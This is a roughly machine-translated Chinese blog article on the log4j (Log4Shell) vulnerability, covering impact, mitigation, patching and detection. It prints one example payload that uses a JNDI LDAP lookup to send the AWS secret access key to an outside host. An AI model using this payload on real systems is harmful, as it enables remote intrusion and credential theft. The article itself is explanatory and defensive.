IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> 漏洞log4j的-a基于Java的日志记录工具的危害 -> 正文阅读

[Java知识库]漏洞log4j的-a基于Java的日志记录工具的危害

近日漏洞被公布为log4j的-a基于Java的日志记录工具,它在Apache日志记录服务项目中的一部分。全球数以百万计的系统使用它来处理日志。

影响:人们将此与 Heartbleed 进行比较,但在许多方面它都更糟。虽然 Heartbleed 影响了所有 TLS 实现,而且这个只影响使用log4j 的系统,但这个问题会以密码/密钥提取和 shell 的形式产生直接和直接的危害

这个漏洞将伴随我们多年,因为恶意负载和易受攻击的系统可以休眠任何时间。在任何时候,他们都可以活着回来并处理导致妥协的恶意负载。

工作原理:该漏洞是由于 log4j 中不安全的“查找”功能导致的,该功能将用户提供的内容作为代码执行,也称为 RCE。因此,如果您提供输入?`${env:PWD}`,它会将 PWD 环境变量写入日志。从那里开始变得更糟,包括将数据从受影响的系统传出,以及——最重要的是——在受影响的系统上生成一个 shell。

示例:这是利用log4j漏洞的一个示例,提取 AWS 密钥并侦听传入请求。

$ {JNDI:LDAP:// $ {ENV:AWS_SECRET_ACCESS_KEY}} .mydogsbutt.com

做什么:解决这个问题的最好办法是找到的所有实例的log4j,并将其修补到2.15+。如果你不能这样做,有一些可能的缓解措施:

  • 补丁:升级到 2.15.0 版。
  • 缓解:对于那些谁不能升级到2.15.0,在版本> = 2.10,此漏洞可被设置为系统属性减轻log4j2.formatMsgNoLookups?或环境变量LOG4J_FORMAT_MSG_NO_LOOKUPS?来true。对于从2.0到beta9 2.10.0版本中,缓解是去除JndiLookup?从类路径类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    注意:WAF 可以帮助但不能解决问题。大多数公司的后端系统已经被这些来自多个入口点的恶意负载堵塞了。我们无法通过阻止更多输入来解决问题。唯一的解决方法是保护将不可避免地与恶意输入接触的系统。
  • 检测:我知道许多公司使用 Semgrep 来查找用户提供的数据中存在漏洞的内容。这是我从R2C/?TLDRSec 的Clint Gibler那里得到的Semgrep 规则示例
  • 疫苗接种:这绝对是事情更疯狂的一面,但一种聪明的方法利用漏洞来缓解漏洞。具体来说,它使用 RCE 功能将环境变量设置LOG4J_FORMAT_MSG_NO_LOOKUPS?为true.?|?通过 Cyber??eason 编码
  • 其他注意事项:正如David Litchfield在多条推文中指出的,这不仅仅是 HTTP。您拥有的任何接受输入的服务,包括 SMTP、IMAP 等,都是额外的攻击媒介。还可以考虑将后端内容的二级和 N 级订单处理作为批处理和其他类型自动化的一部分。

分析:此漏洞的显着之处不仅在于其重要性或影响范围——而是开发人员激励级别的根本原因。就像 Heartbleed 一样——这个项目很少有人关注它,所有的目光都是志愿者。我们应该考虑的不仅仅是log4j。我们应该考虑的是还有多少其他具有类似特征的项目:

  1. 该项目由极少数人在业余时间免费维护,并且
  2. 如果项目出现重大问题,它将破坏整个互联网
  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-12-14 15:48:10  更:2021-12-14 15:50:32 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 6:07:27-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码